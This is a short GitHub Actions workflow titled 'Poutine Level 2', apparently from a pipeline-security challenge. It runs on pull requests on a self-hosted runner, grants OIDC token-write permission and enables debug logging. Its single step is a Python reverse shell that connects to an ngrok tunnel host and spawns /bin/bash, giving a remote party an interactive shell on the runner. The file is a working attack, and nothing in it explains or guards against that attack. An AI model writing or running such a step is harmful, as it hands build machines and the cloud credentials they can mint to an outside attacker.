name: Poutine Level 2
on:
  pull_request:
    
permissions: {}

jobs:
  pulled_pork:
    runs-on: self-hosted
    timeout-minutes: 30
    permissions:
      id-token: write
    env:
      ACTIONS_RUNNER_DEBUG: true
      ACTIONS_STEP_DEBUG: true
    steps:
      - run: |
          python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.eu.ngrok.io", 13986));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
